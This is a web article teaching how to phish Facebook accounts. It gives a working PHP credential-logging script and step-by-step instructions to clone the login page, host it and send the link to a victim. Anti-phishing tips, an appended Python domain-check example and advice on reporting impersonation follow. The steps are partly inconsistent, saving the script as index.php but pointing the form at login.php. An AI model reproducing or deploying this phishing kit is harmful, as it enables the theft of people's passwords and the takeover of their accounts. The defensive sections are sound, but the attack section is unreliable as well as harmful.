Hacking Facebook Via Phishing aka Fake Pages
Wikipedia defines phishing as: "Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication." It's still one of the best methods out there for hacking Facebook accounts. In the simplest of all phishing attacks, a hacker creates a fake login page that looks exactly like the real Facebook page and then somehow gets the victim to log in to that page. Once the victim logs in through the fake page, the victim's "Email Address" and "Password" are stored in a text file, which can be downloaded by the hacker.
"Disclaimer: Hacking is a Cyber Crime. Cyber crimes can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code. Please don't misuse this article!"
Procedure
1. Type the following code in Notepad and save it as "index.php" (without quotes).
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
2. Open "www.facebook.com" in your browser and save the page as "index.html".
3. Open the "index.html" file in Notepad.
4. Find action="https://www.facebook.com/login.php?login_attempt=1" in the file and replace it with action="login.php".
5. The phishing page is ready for use now! Create a free account to make a website on a web hosting site with PHP support. Do a Google search and you'll get plenty of them.
6. Upload "index.html", "index.php" and all files of the "index_files" folder to your site.
7. Send the URL of the site to your victim, and if he logs in then a new log.txt file will be created and their password will be saved in that file. You can access that file from the dashboard of your web hosting service provider.
How to protect yourself from phishing
- Use an up-to-date browser that features an anti-phishing black list.
- Use unique logins and passwords for each of the websites you use.
- Check to see that you're logging in from a legitimate Facebook page with the facebook.com domain.
- Be cautious of any message, post or link you find on Facebook that looks suspicious or requires an additional login.
- Allowing Facebook applications such as Facebook Chat v2.0, Constitution and many other social applications gives the hacker community a gateway into your PC and your FB account.
- Facebook does not send you links that do not come from its domain. Even if the link looks safe, don't trust it.
- If the site has a security update or wants more information, chances are it will ask for it after you log in. Remember, if it seems fishy or not quite right, don't do it.
- Be sure that you add only known people to your profile and do not allow any random applications to your profile.
- Also change the privacy settings of your FB page so that only your friends can view your profile.
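The domain check in the list above can be automated. The Python below is an added example, not code from the original article: it accepts a URL only when it is https and its host is facebook.com or a subdomain, and it flags password forms in a saved page whose action resolves anywhere else. The function names, the sample HTML and the login.example host are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

TRUSTED_DOMAIN = "facebook.com"  # the domain named in the checklist above


def is_trusted_url(url, trusted=TRUSTED_DOMAIN):
    """True only for an https URL whose host is `trusted` or one of its subdomains."""
    try:
        parts = urlsplit(url.strip())
        host = (parts.hostname or "").rstrip(".")  # hostname drops "user@" and ":port"
    except ValueError:
        return False
    if parts.scheme != "https" or not host:
        return False
    # Non-ASCII and punycode labels can render like the real name: treat as untrusted.
    if not host.isascii() or any(p.startswith("xn--") for p in host.split(".")):
        return False
    return host == trusted or host.endswith("." + trusted)


class PasswordFormFinder(HTMLParser):
    """Collects the action of every <form> that contains a password input."""

    def __init__(self):
        super().__init__()
        self.current = None  # action of the form currently open, if any
        self.actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.current = attrs.get("action") or ""
        elif tag == "input" and self.current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self.actions.append(self.current)

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None


def untrusted_password_forms(page_url, html):
    """Resolved targets of password forms that would post outside the trusted domain."""
    finder = PasswordFormFinder()
    finder.feed(html)
    targets = (urljoin(page_url, action) for action in finder.actions)
    return [t for t in targets if not is_trusted_url(t)]


# Constructed sample: a saved copy of a login form served from a look-alike host.
SAMPLE_HTML = '<form action="login.php" method="post"><input name="email"><input type="password" name="pass"></form>'
print(untrusted_password_forms("https://facebook.com.login.example/index.html", SAMPLE_HTML))
```

The suffix test requires a leading dot, so a host such as notfacebook.com does not pass, and reading the parsed hostname rather than searching the string means "facebook.com" appearing before an "@" or as a left-hand label is ignored.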
What If my account was phished...?
One action that you can take is to report the fake profile. To report it, go to the FB page of the fake profile and click on Report/Abuse this profile. You will get a new dialogue box, where you need to check "Report the person". You will be asked to mention the reason. First, select "Fake Profile". Second, select "Impersonated profile"; you also need to post the URL of your original profile. The FB team should then get back to you within the next 24 hrs.